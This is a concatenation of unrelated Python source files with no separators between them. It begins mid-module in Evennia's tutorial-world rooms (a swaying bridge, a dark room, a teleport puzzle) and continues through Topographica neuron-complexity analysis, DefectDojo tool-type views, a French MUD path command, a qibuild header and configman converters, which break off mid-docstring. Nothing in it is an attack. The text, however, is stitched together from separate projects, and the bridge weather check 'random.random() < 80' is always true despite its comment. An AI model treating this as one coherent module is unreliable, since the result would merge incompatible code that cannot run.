        chars = [obj for obj in self.obj.contents_get(exclude=caller) if obj.has_account]
        if chars:
            # we create the You see: message manually here
            message += "\n You see: %s" % ", ".join("|c%s|n" % char.key for char in chars)
        self.caller.msg(message)

        # there is a chance that we fall if we are on the western or central
        # part of the bridge.
        if bridge_position < 3 and random.random() < 0.05 and not self.caller.is_superuser:
            # we fall 5% of time.
            fall_exit = search_object(self.obj.db.fall_exit)
            if fall_exit:
                self.caller.msg("|r%s|n" % FALL_MESSAGE)
                self.caller.move_to(fall_exit[0], quiet=True)
                # inform others on the bridge
                self.obj.msg_contents("A plank gives way under %s's feet and "
                                      "they fall from the bridge!" % self.caller.key)


# custom help command
class CmdBridgeHelp(Command):
    """
    Overwritten help command while on the bridge.
    """
    key = "help"
    aliases = ["h", "?"]
    locks = "cmd:all()"
    help_category = "Tutorial world"

    def func(self):
        """Implements the command."""
        string = "You are trying hard not to fall off the bridge ..." \
                 "\n\nWhat you can do is trying to cross the bridge |weast|n" \
                 " or try to get back to the mainland |wwest|n)."
        self.caller.msg(string)


class BridgeCmdSet(CmdSet):
    """This groups the bridge commands. We will store it on the room."""
    key = "Bridge commands"
    priority = 1  # this gives it precedence over the normal look/help commands.

    def at_cmdset_creation(self):
        """Called at first cmdset creation"""
        self.add(CmdTutorial())
        self.add(CmdEast())
        self.add(CmdWest())
        self.add(CmdLookBridge())
        self.add(CmdBridgeHelp())


BRIDGE_WEATHER = (
    "The rain intensifies, making the planks of the bridge even more slippery.",
    "A gust of wind throws the rain right in your face.",
    "The rainfall eases a bit and the sky momentarily brightens.",
    "The bridge shakes under the thunder of a closeby thunder strike.",
    "The rain pummels you with large, heavy drops. You hear the distinct howl of a large hound in the distance.",
    "The wind is picking up, howling around you and causing the bridge to sway from side to side.",
    "Some sort of large bird sweeps by overhead, giving off an eery screech. Soon it has disappeared in the gloom.",
    "The bridge sways from side to side in the wind.",
    "Below you a particularly large wave crashes into the rocks.",
    "From the ruin you hear a distant, otherwordly howl. Or maybe it was just the wind.")


class BridgeRoom(WeatherRoom):
    """
    The bridge room implements an unsafe bridge. It also enters the player into
    a state where they get new commands so as to try to cross the bridge.

     We want this to result in the account getting a special set of
     commands related to crossing the bridge. The result is that it
     will take several steps to cross it, despite it being represented
     by only a single room.

     We divide the bridge into steps:

        self.db.west_exit     -   -  |  -   -     self.db.east_exit
                              0   1  2  3   4

     The position is handled by a variable stored on the character
     when entering and giving special move commands will
     increase/decrease the counter until the bridge is crossed.

     We also has self.db.fall_exit, which points to a gathering
     location to end up if we happen to fall off the bridge (used by
     the CmdLookBridge command).

    """

    def at_object_creation(self):
        """Setups the room"""
        # this will start the weather room's ticker and tell
        # it to call update_weather regularly.
        super(BridgeRoom, self).at_object_creation()
        # this identifies the exits from the room (should be the command
        # needed to leave through that exit). These are defaults, but you
        # could of course also change them after the room has been created.
        self.db.west_exit = "cliff"
        self.db.east_exit = "gate"
        self.db.fall_exit = "cliffledge"
        # add the cmdset on the room.
        self.cmdset.add_default(BridgeCmdSet)
        # since the default Character's at_look() will access the room's
        # return_description (this skips the cmdset) when
        # first entering it, we need to explicitly turn off the room
        # as a normal view target - once inside, our own look will
        # handle all return messages.
        self.locks.add("view:false()")

    def update_weather(self, *args, **kwargs):
        """
        This is called at irregular intervals and makes the passage
        over the bridge a little more interesting.
        """
        if random.random() < 80:
            # send a message most of the time
            self.msg_contents("|w%s|n" % random.choice(BRIDGE_WEATHER))

    def at_object_receive(self, character, source_location):
        """
        This hook is called by the engine whenever the player is moved
        into this room.
        """
        if character.has_account:
            # we only run this if the entered object is indeed a player object.
            # check so our east/west exits are correctly defined.
            wexit = search_object(self.db.west_exit)
            eexit = search_object(self.db.east_exit)
            fexit = search_object(self.db.fall_exit)
            if not (wexit and eexit and fexit):
                character.msg("The bridge's exits are not properly configured. "
                              "Contact an admin. Forcing west-end placement.")
                character.db.tutorial_bridge_position = 0
                return
            if source_location == eexit[0]:
                # we assume we enter from the same room we will exit to
                character.db.tutorial_bridge_position = 4
            else:
                # if not from the east, then from the west!
                character.db.tutorial_bridge_position = 0
            character.execute_cmd("look")

    def at_object_leave(self, character, target_location):
        """
        This is triggered when the player leaves the bridge room.
        """
        if character.has_account:
            # clean up the position attribute
            del character.db.tutorial_bridge_position


# -------------------------------------------------------------------------------
#
# Dark Room - a room with states
#
# This room limits the movemenets of its denizens unless they carry an active
# LightSource object (LightSource is defined in
#                     tutorialworld.objects.LightSource)
#
# -------------------------------------------------------------------------------


DARK_MESSAGES = ("It is pitch black. You are likely to be eaten by a grue.",
                 "It's pitch black. You fumble around but cannot find anything.",
                 "You don't see a thing. You feel around, managing to bump your fingers hard against something. Ouch!",
                 "You don't see a thing! Blindly grasping the air around you, you find nothing.",
                 "It's totally dark here. You almost stumble over some un-evenness in the ground.",
                 "You are completely blind. For a moment you think you hear someone breathing nearby ... "
                 "\n ... surely you must be mistaken.",
                 "Blind, you think you find some sort of object on the ground, but it turns out to be just a stone.",
                 "Blind, you bump into a wall. The wall seems to be covered with some sort of vegetation,"
                 " but its too damp to burn.",
                 "You can't see anything, but the air is damp. It feels like you are far underground.")

ALREADY_LIGHTSOURCE = "You don't want to stumble around in blindness anymore. You already " \
                      "found what you need. Let's get light already!"

FOUND_LIGHTSOURCE = "Your fingers bump against a splinter of wood in a corner." \
                    " It smells of resin and seems dry enough to burn! " \
                    "You pick it up, holding it firmly. Now you just need to" \
                    " |wlight|n it using the flint and steel you carry with you."


class CmdLookDark(Command):
    """
    Look around in darkness

    Usage:
      look

    Look around in the darkness, trying
    to find something.
    """
    key = "look"
    aliases = ["l", 'feel', 'search', 'feel around', 'fiddle']
    locks = "cmd:all()"
    help_category = "TutorialWorld"

    def func(self):
        """
        Implement the command.

        This works both as a look and a search command; there is a
        random chance of eventually finding a light source.
        """
        caller = self.caller

        if random.random() < 0.8:
            # we don't find anything
            caller.msg(random.choice(DARK_MESSAGES))
        else:
            # we could have found something!
            if any(obj for obj in caller.contents if utils.inherits_from(obj, LightSource)):
                #  we already carry a LightSource object.
                caller.msg(ALREADY_LIGHTSOURCE)
            else:
                # don't have a light source, create a new one.
                create_object(LightSource, key="splinter", location=caller)
                caller.msg(FOUND_LIGHTSOURCE)


class CmdDarkHelp(Command):
    """
    Help command for the dark state.
    """
    key = "help"
    locks = "cmd:all()"
    help_category = "TutorialWorld"

    def func(self):
        """
        Replace the the help command with a not-so-useful help
        """
        string = "Can't help you until you find some light! Try looking/feeling around for something to burn. " \
                 "You shouldn't give up even if you don't find anything right away."
        self.caller.msg(string)


class CmdDarkNoMatch(Command):
    """
    This is a system command. Commands with special keys are used to
    override special sitations in the game. The CMD_NOMATCH is used
    when the given command is not found in the current command set (it
    replaces Evennia's default behavior or offering command
    suggestions)
    """
    key = syscmdkeys.CMD_NOMATCH
    locks = "cmd:all()"

    def func(self):
        """Implements the command."""
        self.caller.msg("Until you find some light, there's not much you can do. Try feeling around.")


class DarkCmdSet(CmdSet):
    """
    Groups the commands of the dark room together.  We also import the
    default say command here so that players can still talk in the
    darkness.

    We give the cmdset the mergetype "Replace" to make sure it
    completely replaces whichever command set it is merged onto
    (usually the default cmdset)
    """
    key = "darkroom_cmdset"
    mergetype = "Replace"
    priority = 2

    def at_cmdset_creation(self):
        """populate the cmdset."""
        self.add(CmdTutorial())
        self.add(CmdLookDark())
        self.add(CmdDarkHelp())
        self.add(CmdDarkNoMatch())
        self.add(default_cmds.CmdSay)


class DarkRoom(TutorialRoom):
    """
    A dark room. This tries to start the DarkState script on all
    objects entering. The script is responsible for making sure it is
    valid (that is, that there is no light source shining in the room).

    The is_lit Attribute is used to define if the room is currently lit
    or not, so as to properly echo state changes.

    Since this room (in the tutorial) is meant as a sort of catch-all,
    we also make sure to heal characters ending up here, since they
    may have been beaten up by the ghostly apparition at this point.

    """

    def at_object_creation(self):
        """
        Called when object is first created.
        """
        super(DarkRoom, self).at_object_creation()
        self.db.tutorial_info = "This is a room with custom command sets on itself."
        # the room starts dark.
        self.db.is_lit = False
        self.cmdset.add(DarkCmdSet, permanent=True)

    def at_init(self):
        """
        Called when room is first recached (such as after a reload)
        """
        self.check_light_state()

    def _carries_light(self, obj):
        """
        Checks if the given object carries anything that gives light.

        Note that we do NOT look for a specific LightSource typeclass,
        but for the Attribute is_giving_light - this makes it easy to
        later add other types of light-giving items. We also accept
        if there is a light-giving object in the room overall (like if
        a splinter was dropped in the room)
        """
        return obj.is_superuser or obj.db.is_giving_light or any(o for o in obj.contents if o.db.is_giving_light)

    def _heal(self, character):
        """
        Heal a character.
        """
        health = character.db.health_max or 20
        character.db.health = health

    def check_light_state(self, exclude=None):
        """
        This method checks if there are any light sources in the room.
        If there isn't it makes sure to add the dark cmdset to all
        characters in the room. It is called whenever characters enter
        the room and also by the Light sources when they turn on.

        Args:
            exclude (Object): An object to not include in the light check.
        """
        if any(self._carries_light(obj) for obj in self.contents if obj != exclude):
            self.locks.add("view:all()")
            self.cmdset.remove(DarkCmdSet)
            self.db.is_lit = True
            for char in (obj for obj in self.contents if obj.has_account):
                # this won't do anything if it is already removed
                char.msg("The room is lit up.")
        else:
            # noone is carrying light - darken the room
            self.db.is_lit = False
            self.locks.add("view:false()")
            self.cmdset.add(DarkCmdSet, permanent=True)
            for char in (obj for obj in self.contents if obj.has_account):
                if char.is_superuser:
                    char.msg("You are Superuser, so you are not affected by the dark state.")
                else:
                    # put players in darkness
                    char.msg("The room is completely dark.")

    def at_object_receive(self, obj, source_location):
        """
        Called when an object enters the room.
        """
        if obj.has_account:
            # a puppeted object, that is, a Character
            self._heal(obj)
            # in case the new guy carries light with them
            self.check_light_state()

    def at_object_leave(self, obj, target_location):
        """
        In case people leave with the light, we make sure to clear the
        DarkCmdSet if necessary.  This also works if they are
        teleported away.
        """
        # since this hook is called while the object is still in the room,
        # we exclude it from the light check, to ignore any light sources
        # it may be carrying.
        self.check_light_state(exclude=obj)


# -------------------------------------------------------------
#
# Teleport room - puzzles solution
#
# This is a sort of puzzle room that requires a certain
# attribute on the entering character to be the same as
# an attribute of the room. If not, the character will
# be teleported away to a target location. This is used
# by the Obelisk - grave chamber puzzle, where one must
# have looked at the obelisk to get an attribute set on
# oneself, and then pick the grave chamber with the
# matching imagery for this attribute.
#
# -------------------------------------------------------------


class TeleportRoom(TutorialRoom):
    """
    Teleporter - puzzle room.

    Important attributes (set at creation):
      puzzle_key    - which attr to look for on character
      puzzle_value  - what char.db.puzzle_key must be set to
      success_teleport_to -  where to teleport in case if success
      success_teleport_msg - message to echo while teleporting to success
      failure_teleport_to - where to teleport to in case of failure
      failure_teleport_msg - message to echo while teleporting to failure

    """

    def at_object_creation(self):
        """Called at first creation"""
        super(TeleportRoom, self).at_object_creation()
        # what character.db.puzzle_clue must be set to, to avoid teleportation.
        self.db.puzzle_value = 1
        # target of successful teleportation. Can be a dbref or a
        # unique room name.
        self.db.success_teleport_msg = "You are successful!"
        self.db.success_teleport_to = "treasure room"
        # the target of the failure teleportation.
        self.db.failure_teleport_msg = "You fail!"
        self.db.failure_teleport_to = "dark cell"

    def at_object_receive(self, character, source_location):
        """
        This hook is called by the engine whenever the player is moved into
        this room.
        """
        if not character.has_account:
            # only act on player characters.
            return
        # determine if the puzzle is a success or not
        is_success = str(character.db.puzzle_clue) == str(self.db.puzzle_value)
        teleport_to = self.db.success_teleport_to if is_success else self.db.failure_teleport_to
        # note that this returns a list
        results = search_object(teleport_to)
        if not results or len(results) > 1:
            # we cannot move anywhere since no valid target was found.
            character.msg("no valid teleport target for %s was found." % teleport_to)
            return
        if character.is_superuser:
            # superusers don't get teleported
            character.msg("Superuser block: You would have been teleported to %s." % results[0])
            return
        # perform the teleport
        if is_success:
            character.msg(self.db.success_teleport_msg)
        else:
            character.msg(self.db.failure_teleport_msg)
        # teleport quietly to the new place
        character.move_to(results[0], quiet=True, move_hooks=False)
        # we have to call this manually since we turn off move_hooks
        # - this is necessary to make the target dark room aware of an
        # already carried light.
        results[0].at_object_receive(character, self)


# -------------------------------------------------------------
#
# Outro room - unique exit room
#
# Cleans up the character from all tutorial-related properties.
#
# -------------------------------------------------------------

class OutroRoom(TutorialRoom):
    """
    Outro room.

    Called when exiting the tutorial, cleans the
    character of tutorial-related attributes.

    """

    def at_object_creation(self):
        """
        Called when the room is first created.
        """
        super(OutroRoom, self).at_object_creation()
        self.db.tutorial_info = "The last room of the tutorial. " \
                                "This cleans up all temporary Attributes " \
                                "the tutorial may have assigned to the "\
                                "character."

    def at_object_receive(self, character, source_location):
        """
        Do cleanup.
        """
        if character.has_account:
            del character.db.health_max
            del character.db.health
            del character.db.last_climbed
            del character.db.puzzle_clue
            del character.db.combat_parry_mode
            del character.db.tutorial_bridge_position
            for obj in character.contents:
                if obj.typeclass_path.startswith("evennia.contrib.tutorial_world"):
                    obj.delete()
            character.tags.clear(category="tutorial_world")

"""
Vision-specific analysis functions.

$Id: featureresponses.py 7714 2008-01-24 16:42:21Z antolikjan $
"""
__version__='$Revision: 7714 $'

from math import fmod,floor,pi,sin,cos,sqrt

import numpy
from numpy.oldnumeric import Float
from numpy import zeros, array, size, empty, object_
#import scipy

try:
    import pylab
except ImportError:
    print "Warning: Could not import matplotlib; pylab plots will not work."

import param

import topo
from topo.base.cf import CFSheet
from topo.base.sheetview import SheetView
from topo.misc.filepath import normalize_path
from topo.misc.numbergenerator import UniformRandom
from topo.plotting.plotgroup import create_plotgroup, plotgroups
from topo.command.analysis import measure_sine_pref

max_value = 0
global_index = ()

def _complexity_rec(x,y,index,depth,fm):
        """
        Recurrent helper function for complexity()
        """
        global max_value
        global global_index
        if depth<size(fm.features):
            for i in range(size(fm.features[depth].values)):
                _complexity_rec(x,y,index + (i,),depth+1,fm)
        else:
            if max_value < fm.full_matrix[index][x][y]:
                global_index = index
                max_value = fm.full_matrix[index][x][y]    
    


def complexity(full_matrix):
    global global_index
    global max_value
    """This function expects as an input a object of type FullMatrix which contains
    responses of all neurons in a sheet to stimuly with different varying parameter values.
    One of these parameters (features) has to be phase. In such case it computes the classic
    modulation ratio (see Hawken et al. for definition) for each neuron and returns them as a matrix.
    """
    rows,cols = full_matrix.matrix_shape
    complexity = zeros(full_matrix.matrix_shape)
    complex_matrix = zeros(full_matrix.matrix_shape,object_)
    fftmeasure = zeros(full_matrix.matrix_shape,Float)
    i = 0
    for f in full_matrix.features:
        if f.name == "phase":
            
            phase_index = i
            break
        i=i+1
    sum = 0.0
    res = 0.0
    average = 0.0
    for x in range(rows):
        for y in range(cols):
            complex_matrix[x,y] = []#
            max_value=-0.01
            global_index = ()
            _complexity_rec(x,y,(),0,full_matrix)
            
            #compute the sum of the responses over phases given the found index of highest response 

            iindex = array(global_index)
            sum = 0.0
            for i in range(size(full_matrix.features[phase_index].values)):
                iindex[phase_index] = i
                sum = sum + full_matrix.full_matrix[tuple(iindex.tolist())][x][y]
                
            #average
            average = sum / float(size(full_matrix.features[phase_index].values))
            
            res = 0.0
            #compute the sum of absolute values of the responses minus average
            for i in range(size(full_matrix.features[phase_index].values)):
                iindex[phase_index] = i
                res = res + abs(full_matrix.full_matrix[tuple(iindex.tolist())][x][y] - average)
                complex_matrix[x,y] = complex_matrix[x,y] + [full_matrix.full_matrix[tuple(iindex.tolist())][x][y]]

            #this is taking away the DC component
            #complex_matrix[x,y] -= numpy.min(complex_matrix[x,y])
            if x==15 and y==15:
                pylab.figure()
                pylab.plot(complex_matrix[x,y])
            if x==26 and y==26:
                pylab.figure()
                pylab.plot(complex_matrix[x,y])
 
            #complexity[x,y] = res / (2*sum)
            fft = numpy.fft.fft(complex_matrix[x,y]+complex_matrix[x,y]+complex_matrix[x,y]+complex_matrix[x,y],2048)
            first_har = 2048/len(complex_matrix[0,0])
            if abs(fft[0]) != 0:
                fftmeasure[x,y] = 2 *abs(fft[first_har]) /abs(fft[0])
            else:
                fftmeasure[x,y] = 0
    return fftmeasure


def compute_ACDC_orientation_tuning_curves(full_matrix,curve_label,sheet):
    
    """ This function allows and alternative computation of orientation tuning curve where
    for each given orientation the response is computed as a maximum of AC or DC component 
    across the phases instead of the maximum used as a standard in Topographica"""
    # this method assumes that only single frequency has been used
    i = 0
    for f in full_matrix.features:
        if f.name == "phase":
            phase_index = i
        if f.name == "orientation":
            orientation_index = i
        if f.name == "frequency":
            frequency_index = i
        i=i+1   
    print sheet.curve_dict
    if not sheet.curve_dict.has_key("orientationACDC"):
        sheet.curve_dict["orientationACDC"]={}
    sheet.curve_dict["orientationACDC"][curve_label]={}
    
    rows,cols = full_matrix.matrix_shape
    for o in xrange(size(full_matrix.features[orientation_index].values)):
        s_w = zeros(full_matrix.matrix_shape)
        for x in range(rows):
            for y in range(cols):
                or_response=[] 
                for p in xrange(size(full_matrix.features[phase_index].values)):
                    index = [0,0,0]
                    index[phase_index] = p
                    index[orientation_index] = o
                    index[frequency_index] = 0
                    or_response.append(full_matrix.full_matrix[tuple(index)][x][y])
                 
                fft = numpy.fft.fft(or_response+or_response+or_response+or_response,2048)   
                first_har = 2048/len(or_response)   
                s_w[x][y] = numpy.maximum(2 *abs(fft[first_har]),abs(fft[0]))
        s = SheetView((s_w,sheet.bounds), sheet.name , sheet.precedence, topo.sim.time(),sheet.row_precedence)
        sheet.curve_dict["orientationACDC"][curve_label].update({full_matrix.features[orientation_index].values[o]:s}) 
    


def phase_preference_scatter_plot(sheet_name,diameter=0.39):
    r = UniformRandom(seed=1023)
    preference_map = topo.sim[sheet_name].sheet_views['PhasePreference']
    offset_magnitude = 0.03
    datax = []
    datay = []
    (v,bb) = preference_map.view()
    for z in zeros(66):
        x = (r() - 0.5)*2*diameter
        y = (r() - 0.5)*2*diameter
        rand = r()
        xoff = sin(rand*2*pi)*offset_magnitude
        yoff = cos(rand*2*pi)*offset_magnitude
        xx = max(min(x+xoff,diameter),-diameter)
        yy = max(min(y+yoff,diameter),-diameter)
        x = max(min(x,diameter),-diameter)
        y = max(min(y,diameter),-diameter)
        [xc1,yc1] = topo.sim[sheet_name].sheet2matrixidx(xx,yy)
        [xc2,yc2] = topo.sim[sheet_name].sheet2matrixidx(x,y)
        if((xc1==xc2) &  (yc1==yc2)): continue
        datax = datax + [v[xc1,yc1]]
        datay = datay + [v[xc2,yc2]]
    
    for i in range(0,len(datax)):
        datax[i] = datax[i] * 360
        datay[i] = datay[i] * 360
        if(datay[i] > datax[i] + 180): datay[i]=  datay[i]- 360
        if((datax[i] > 180) & (datay[i]> 180)): datax[i] = datax[i] - 360; datay[i] = datay[i] - 360
        if((datax[i] > 180) & (datay[i] < (datax[i]-180))): datax[i] = datax[i] - 360; #datay[i] = datay[i] - 360
        
    f = pylab.figure()
    ax = f.add_subplot(111, aspect='equal')
    pylab.plot(datax,datay,'ro')
    pylab.plot([0,360],[-180,180])
    pylab.plot([-180,180],[0,360])
    pylab.plot([-180,-180],[360,360])
    ax.axis([-180,360,-180,360])
    pylab.xticks([-180,0,180,360], [-180,0,180,360])
    pylab.yticks([-180,0,180,360], [-180,0,180,360])
    pylab.grid()
    pylab.savefig(normalize_path(str(topo.sim.timestr()) + sheet_name + "_scatter.png"))



###############################################################################
# JABALERT: Should we move this plot and command to analysis.py or
# pylabplots.py, where all the rest are?
#
# In any case, it requires generalization; it should not be hardcoded
# to any particular map name, and should just do the right thing for
# most networks for which it makes sense.  E.g. it already measures
# the ComplexSelectivity for all measured_sheets, but then
# plot_modulation_ratio only accepts two with specific names.
# plot_modulation_ratio should just plot whatever it is given, and
# then analyze_complexity can simply pass in whatever was measured,
# with the user controlling what is measured using the measure_map
# attribute of each Sheet.  That way the complexity of any sheet could
# be measured, which is what we want.
#
# Specific changes needed:
#   - Make plot_modulation_ratio accept a list of sheets and
#      plot their individual modulation ratios and combined ratio.
#   - Remove complex_sheet_name argument, which is no longer needed
#   - Make sure it still works fine even if V1Simple doesn't exist;
#     as this is just for an optional scatter plot, it's fine to skip
#     it.
#   - Preferably remove the filename argument by default, so that
#     plots will show up in the GUI


def analyze_complexity(full_matrix,simple_sheet_name,complex_sheet_name,filename=None):
    """
    Compute modulation ratio for each neuron, to distinguish complex from simple cells.

    Uses full_matrix data obtained from measure_or_pref().

    If there is a sheet named as specified in simple_sheet_name,
    also plots its phase preference as a scatter plot.
    """
    import topo
    measured_sheets = [s for s in topo.sim.objects(CFSheet).values()
                       if hasattr(s,'measure_maps') and s.measure_maps]

    for sheet in measured_sheets:   
        # Divide by two to get into 0-1 scale - that means simple/complex boundry is now at 0.5
        complx = array(complexity(full_matrix[sheet]))/2.0 
        # Should this be renamed to ModulationRatio?
        sheet.sheet_views['ComplexSelectivity']=SheetView((complx,sheet.bounds), sheet.name , sheet.precedence, topo.sim.time(),sheet.row_precedence)
    import topo.command.pylabplots
    topo.command.pylabplots.plot_modulation_ratio(full_matrix,simple_sheet_name=simple_sheet_name,complex_sheet_name=complex_sheet_name,filename=filename)

    # Avoid error if no simple sheet exists
    try:
        phase_preference_scatter_plot(simple_sheet_name,diameter=0.24999)
    except AttributeError:
        print "Skipping phase preference scatter plot; could not analyze region %s." \
              % simple_sheet_name


class measure_and_analyze_complexity(measure_sine_pref):
    """Macro for measuring orientation preference and then analyzing its complexity."""
    def __call__(self,**params):
        fm = super(measure_and_analyze_complexity,self).__call__(**params)
        #from topo.command.analysis import measure_or_pref
        #fm = measure_or_pref()
        analyze_complexity(fm,simple_sheet_name="V1Simple",complex_sheet_name="V1Complex",filename="ModulationRatio")
    

pg= create_plotgroup(name='Orientation Preference and Complexity',category="Preference Maps",
             doc='Measure preference for sine grating orientation.',
             pre_plot_hooks=[measure_and_analyze_complexity.instance()])
pg.add_plot('Orientation Preference',[('Hue','OrientationPreference')])
pg.add_plot('Orientation Preference&Selectivity',[('Hue','OrientationPreference'),
                                                   ('Confidence','OrientationSelectivity')])
pg.add_plot('Orientation Selectivity',[('Strength','OrientationSelectivity')])
pg.add_plot('Modulation Ratio',[('Strength','ComplexSelectivity')])
pg.add_plot('Phase Preference',[('Hue','PhasePreference')])
pg.add_static_image('Color Key','command/or_key_white_vert_small.png')



# #  product
import logging

from django.contrib import messages
from django.contrib.auth.decorators import user_passes_test
from django.urls import reverse
from django.http import HttpResponseRedirect
from django.shortcuts import render
from dojo.utils import add_breadcrumb
from dojo.forms import ToolTypeForm
from dojo.models import Tool_Type

logger = logging.getLogger(__name__)


@user_passes_test(lambda u: u.is_staff)
def new_tool_type(request):
    if request.method == 'POST':
        tform = ToolTypeForm(request.POST, instance=Tool_Type())
        if tform.is_valid():
            tform.save()
            messages.add_message(request,
                                 messages.SUCCESS,
                                 'Tool Type Configuration Successfully Created.',
                                 extra_tags='alert-success')
            return HttpResponseRedirect(reverse('tool_type', ))
    else:
        tform = ToolTypeForm()
        add_breadcrumb(title="New Tool Type Configuration", top_level=False, request=request)
    return render(request, 'dojo/new_tool_type.html',
                  {'tform': tform})


@user_passes_test(lambda u: u.is_staff)
def edit_tool_type(request, ttid):
    tool_type = Tool_Type.objects.get(pk=ttid)
    if request.method == 'POST':
        tform = ToolTypeForm(request.POST, instance=tool_type)
        if tform.is_valid():
            tform.save()
            messages.add_message(request,
                                 messages.SUCCESS,
                                 'Tool Type Configuration Successfully Updated.',
                                 extra_tags='alert-success')
            return HttpResponseRedirect(reverse('tool_type', ))
    else:
        tform = ToolTypeForm(instance=tool_type)
    add_breadcrumb(title="Edit Tool Type Configuration", top_level=False, request=request)

    return render(request,
                  'dojo/edit_tool_type.html',
                  {
                      'tform': tform,
                  })


@user_passes_test(lambda u: u.is_staff)
def tool_type(request):
    confs = Tool_Type.objects.all().order_by('name')
    add_breadcrumb(title="Tool Type List", top_level=not len(request.GET), request=request)
    return render(request,
                  'dojo/tool_type.html',
                  {'confs': confs,
                   })

# -*-coding:Utf-8 -*

# Copyright (c) 2010-2017 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
#   list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
#   this list of conditions and the following disclaimer in the documentation
#   and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
#   may be used to endorse or promote products derived from this software
#   without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.


"""Fichier contenant le paramètre 'voir' de la commande 'chemin'."""

from primaires.format.fonctions import oui_ou_non
from primaires.interpreteur.masque.parametre import Parametre
from primaires.pnj.chemin import FLAGS
class PrmVoir(Parametre):

    """Commande 'chemin voir'.

    """

    def __init__(self):
        """Constructeur du paramètre"""
        Parametre.__init__(self, "voir", "view")
        self.schema = "<cle>"
        self.aide_courte = "affiche le détail d'un chemin"
        self.aide_longue = \
            "Cette commande permet d'obtenir plus d'informations sur " \
            "un chemin (ses flags actifs, ses salles et sorties...)."

    def ajouter(self):
        """Méthode appelée lors de l'ajout de la commande à l'interpréteur"""
        cle = self.noeud.get_masque("cle")
        cle.proprietes["regex"] = r"'[a-z0-9_:]{3,}'"

    def interpreter(self, personnage, dic_masques):
        """Interprétation du paramètre"""
        cle = dic_masques["cle"].cle
        if cle not in importeur.pnj.chemins:
            personnage << "|err|Ce chemin n'existe pas.|ff|"
            return

        chemin = importeur.pnj.chemins[cle]
        msg = "Détail sur le chemin {} :".format(chemin.cle)
        msg += "\n  Flags :"
        for nom_flag in FLAGS.keys():
            msg += "\n    {}".format(nom_flag.capitalize())
            msg += " : " + oui_ou_non(chemin.a_flag(nom_flag))
        msg += "\n  Salles du chemin :"
        if len(chemin.salles) == 0:
            msg += "\n    Aucune"
        else:
            for salle, direction in chemin.salles.items():
                msg += "\n    " + salle.ident.ljust(20) + " "
                msg += direction.ljust(10)
                if salle in chemin.salles_retour and \
                        chemin.salles_retour[salle]:
                    msg += " (retour " + chemin.salles_retour[salle] + ")"

        personnage << msg

#This is where the tests go.

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2012-2021 SoftBank Robotics. All rights reserved.
# Use of this source code is governed by a BSD-style license (see the COPYING file).
""" This package contains the qibuild actions. """
from __future__ import absolute_import
from __future__ import unicode_literals
from __future__ import print_function

# ***** BEGIN LICENSE BLOCK *****
# Version: MPL 1.1/GPL 2.0/LGPL 2.1
#
# The contents of this file are subject to the Mozilla Public License Version
# 1.1 (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
# http://www.mozilla.org/MPL/
#
# Software distributed under the License is distributed on an "AS IS" basis,
# WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
# for the specific language governing rights and limitations under the
# License.
#
# The Original Code is configman
#
# The Initial Developer of the Original Code is
# Mozilla Foundation
# Portions created by the Initial Developer are Copyright (C) 2011
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
#    K Lars Lohn, lars@mozilla.com
#    Peter Bengtsson, peterbe@mozilla.com
#
# Alternatively, the contents of this file may be used under the terms of
# either the GNU General Public License Version 2 or later (the "GPL"), or
# the GNU Lesser General Public License Version 2.1 or later (the "LGPL"),
# in which case the provisions of the GPL or the LGPL are applicable instead
# of those above. If you wish to allow use of your version of this file only
# under the terms of either the GPL or the LGPL, and not to allow others to
# use your version of this file under the terms of the MPL, indicate your
# decision by deleting the provisions above and replace them with the notice
# and other provisions required by the GPL or the LGPL. If you do not delete
# the provisions above, a recipient may use your version of this file under
# the terms of any one of the MPL, the GPL or the LGPL.
#
# ***** END LICENSE BLOCK *****

import sys
import re
import datetime
import types
import inspect
import collections
import json

from required_config import RequiredConfig
from namespace import Namespace

from .datetime_util import datetime_from_ISO_string as datetime_converter
from .datetime_util import date_from_ISO_string as date_converter

import datetime_util


#------------------------------------------------------------------------------
def option_value_str(an_option):
    """return an instance of Option's value as a string.

    The option instance doesn't actually have to be from the Option class. All
    it requires is that the passed option instance has a ``value`` attribute.
    """
    if an_option.value is None:
        return ''
    try:
        converter = to_string_converters[type(an_option.value)]
        s = converter(an_option.value)
    except KeyError:
        if not isinstance(an_option.value, basestring):
            s = unicode(an_option.value)
        else:
            s = an_option.value
    if an_option.from_string_converter in converters_requiring_quotes:
        s = "'''%s'''" % s
    return s


#------------------------------------------------------------------------------
def str_dict_keys(a_dict):
    """return a modified dict where all the keys that are anything but str get
    converted to str.
    E.g.

      >>> result = str_dict_keys({u'name': u'Peter', u'age': 99, 1: 2})
      >>> # can't compare whole dicts in doctests
      >>> result['name']
      u'Peter'
      >>> result['age']
      99
      >>> result[1]
      2

    The reason for this is that in Python <= 2.6.4 doing
    ``MyClass(**{u'name': u'Peter'})`` would raise a TypeError

    Note that only unicode types are converted to str types.
    The reason for that is you might have a class that looks like this::

        class Option(object):
            def __init__(self, foo=None, bar=None, **kwargs):
                ...

    And it's being used like this::

